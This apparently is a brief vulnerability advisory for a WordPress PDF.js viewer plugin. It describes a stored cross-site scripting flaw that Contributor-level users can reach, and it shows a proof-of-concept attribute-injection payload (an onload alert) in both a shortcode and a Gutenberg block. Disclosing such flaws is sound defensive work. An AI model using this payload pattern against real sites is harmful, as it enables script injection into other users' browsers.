The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks
[pdfjs-viewer search_term='" onload="alert(/XSS/)']
<!-- wp:pdfjsblock/pdfjs-embed {"searchText":"this is ignored"} -->
<div class="wp-block-pdfjsblock-pdfjs-embed pdfjs-wrapper">[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text="on" zoom=0 search_term='" onload="alert(/XSS/)' ]</div>
<!-- /wp:pdfjsblock/pdfjs-embed -->